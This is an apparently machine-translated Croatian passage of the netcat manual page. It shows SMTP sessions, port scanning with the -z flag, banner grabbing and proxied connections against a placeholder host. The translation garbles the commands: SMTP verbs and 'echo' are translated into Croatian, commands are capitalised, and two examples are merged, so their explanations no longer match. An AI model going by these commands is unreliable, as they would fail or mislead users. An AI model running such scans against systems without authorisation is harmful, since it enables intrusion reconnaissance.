Imajte na umu da ovo također prikazuje zaglavlja koja šalje web poslužitelj. Mogu se filtrirati pomoću alata kao što je sed, ako je potrebno.
Složeniji primjeri mogu se napraviti kada korisnik zna format zahtjeva koji zahtijeva poslužitelj. Kao drugi primjer, e-pošta se može poslati SMTP poslužitelju koristeći:
Nc [-C] lokalni host 25<< EOF HELO host.example.com MAIL FROM:< >RCPT ZA:< >PODACI Tijelo e-maila. . NAPUSTI EOF
Skeniranje priključaka
Može biti korisno znati koji su portovi otvoreni i izvode usluge na ciljnom računalu. The -z zastava se može koristiti za otkrivanje nc za prijavu otvorenih portova, umjesto pokretanja veze. Obično je korisno uključiti verbose izlaz u stderr korištenjem ove opcije u kombinaciji s -v opcija.
Nc -zv host.example.com 20-30 Povezivanje s host.example.com 22 port uspjelo! Povezivanje s host.example.com 25 portom uspjelo!
Raspon priključaka naveden je kako bi se pretraživanje ograničilo na priključke 20 - 30 , i skenira se rastućim redoslijedom.
Također možete odrediti popis portova za skeniranje, na primjer:
Nc -zv host.example.com 80 20 22 nc: povezivanje s host.example.com 80 (tcp) nije uspjelo: veza odbijena nc: povezivanje s host.example.com 20 (tcp) nije uspjelo: veza odbijena Veza s host.example .com priključak uspio!
Priključci se skeniraju redoslijedom koji ste zadali.
Alternativno, moglo bi biti korisno znati koji poslužiteljski softver radi i koje verzije. Te se informacije često nalaze u natpisima s čestitkama. Da biste ih dohvatili, potrebno je prvo uspostaviti vezu, a zatim prekinuti vezu kada je banner dohvaćen. To se može postići određivanjem malog vremenskog ograničenja s -w zastavicom, ili možda izdavanjem naredbe "QUIT" poslužitelju:
Odjek "QUIT" | nc host.example.com 20-30 SSH-1.99-OpenSSH_3.6.1p2 Neusklađenost protokola. 220 host.example.com IMS SMTP prijemnik Verzija 0.84 spreman
Primjeri
nc -p 31337 -w 5 host.example.com 42Otvara TCP vezu s portom 42 od host.example.com koristeći luku 31337 kao izvorni port, s vremenskim ograničenjem od 5 sekundi.
Nc -u host.example.com 53 nc -x10.2.3.4:8080 -Xconnect -Pruser host.example.com 42
Isto kao u gornjem primjeru, ali ovaj put omogućava proxy provjeru autentičnosti s korisničkim imenom " ruser" ako proxy to zahtijeva.
Povezane naredbe
ifconfig— Pregledajte ili izmijenite konfiguraciju mrežnih sučelja.